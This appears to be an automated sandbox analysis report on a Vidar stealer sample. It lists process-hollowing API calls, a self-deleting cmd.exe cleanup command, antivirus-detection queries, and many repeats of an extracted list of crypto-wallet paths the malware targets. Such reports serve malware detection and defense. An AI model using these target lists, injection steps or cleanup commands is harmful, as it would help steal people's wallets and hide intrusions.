HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory allocated: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 protect: page execute and read and write Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_02EEBEF0
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 value starts with: 4D5A Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\82xul16VKj.exe Section unmapped: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 425000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 42E000 Jump to behavior
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory written: C:\Users\user\AppData\Local\Temp\kat2B07.tmp base: 643000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\82xul16VKj.exe Process created: C:\Users\user\AppData\Local\Temp\kat2B07.tmp C:\Users\user\AppData\Local\Temp\kat2B07.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: GetLocaleInfoW, 2_2_1D732112
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: GetLocaleInfoW, 2_2_1D732112
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: EnumSystemLocalesW, 2_2_1D90FF17
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 2_2_1D73298C
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73433C GetSystemTimeAsFileTime, 2_2_1D73433C
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D914D7C GetTimeZoneInformation, 2_2_1D914D7C
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected CryptOne packer
Source: Yara match File source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
